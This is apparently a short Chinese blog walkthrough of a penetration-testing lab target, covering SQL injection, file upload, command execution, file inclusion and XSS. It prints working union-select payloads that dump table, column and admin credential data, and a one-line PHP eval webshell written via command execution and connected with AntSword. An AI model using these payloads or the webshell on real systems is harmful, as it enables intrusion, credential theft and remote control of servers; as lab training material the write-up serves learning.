一.SQL注入漏洞
1.输入id=1 --+ 下方出现数据说明闭合成功
2.测试得出数据库有三列
3.三处都是回显点
4.联合查询爆出库名
5.查表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+
6.查字段名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+
7. 查出用户名和密码
?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+
二.文件上传漏洞
1.用我们刚才获取的用户名和密码登录后发现可以上传文件
2.上传一句话木马进去
3.将文件地址拼接到网址后进行访问
4.使用蚁剑连接
三.命令执行漏洞
1.网址下方的输入框提示我们可以执行命令
2.尝试输入ls有效
3.借助这个漏洞我们写一句话木马到888.php 并访问
echo '<?php @eval($_POST[cmd]);?>' > 888.php
4.复制地址用蚁剑连接
四.文件包含漏洞
1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含
2.访问php文件复制地址蚁剑连连接即可
五.XSS漏洞
在登录框中测试有没有XSS漏洞,成功弹窗
标签:name,渗透,漏洞,SEAFARING,--+,table,靶场,id,schema From: https://blog.csdn.net/kknifek/article/details/142217431